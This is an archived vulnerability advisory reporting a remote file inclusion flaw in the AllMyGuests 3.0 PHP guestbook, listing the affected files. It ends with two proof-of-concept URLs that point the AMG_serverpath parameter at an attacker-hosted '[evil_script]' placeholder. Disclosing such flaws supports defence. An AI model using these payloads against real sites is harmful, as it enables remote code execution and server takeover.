25 lines
No EOL
504 B
Text
25 lines
No EOL
504 B
Text
AllMyGuests 3.0 Remote File Inclusion Vulnerability
|
|
|
|
#Software: AllMyGuests
|
|
|
|
#Version: 3.0
|
|
|
|
#Download: http://download.php-resource.net/AllMyGuests/AllMyGuests0.3.0.zip
|
|
|
|
#Found By: beks
|
|
|
|
#Bug In:
|
|
|
|
/include/submit.inc.php
|
|
/admin/index.php
|
|
/include/cm_submit.inc.php
|
|
/comments.php
|
|
/index.php
|
|
/signin.php
|
|
|
|
#Risk: Medium
|
|
|
|
http://[target]/[AllMyGuests_Path]/comments.php?AMG_serverpath=[evil_script]
|
|
http://[target]/[AllMyGuests_Path]/signin.php?sent=1&AMG_serverpath=[evil_script]
|
|
|
|
# milw0rm.com [2007-01-07] |